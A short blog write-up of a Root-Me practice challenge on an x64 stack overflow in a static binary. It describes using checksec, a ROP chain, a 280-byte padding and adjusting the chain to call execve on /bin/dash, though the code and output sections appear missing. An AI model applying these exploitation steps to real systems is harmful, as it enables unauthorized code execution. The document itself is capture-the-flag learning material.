root-me:x64 stack overflow advanced

x64 stack overflow advanced

general

its compile option:
gcc -o ch34 ch34.c -fno-stack-protector -Wl,-z,relro,-z,now,-z,noexecstack -static

universe exploit method:

  • leak a used function
  • calc offset with libc.so and the function to get system and /bin/sh
  • ret2libc(when NX enabled) or write shellcode

calc the truth address:

But in this program,static method was used to compile it,all the function address are static.

step

checksec:

According to above analysis we can use rop gadgets:

get an universe rop chain:

calc the padding length:

So the padding length is 280.

Another question we have to mention is that on my computer /bin/sh is a soft link of /bin/dash,but on the pratice computer is not.I need to edit the rop chain to make it run execve("/bin/dash",NULL,NULL) instead of execve("/bin/sh",NULL,NULL)

let’s look at here:

  • extra / in string /bin//sh at line 4 is used to be stack alignment,alse we can use //bin/sh to produce the same effect
  • string end \0 is set at line 7-9

so we could devide ////////bin/dash into two parts://////// and bin/dash

exploit

run it:

Leave a Comment

电子邮件地址不会被公开。 必填项已用*标注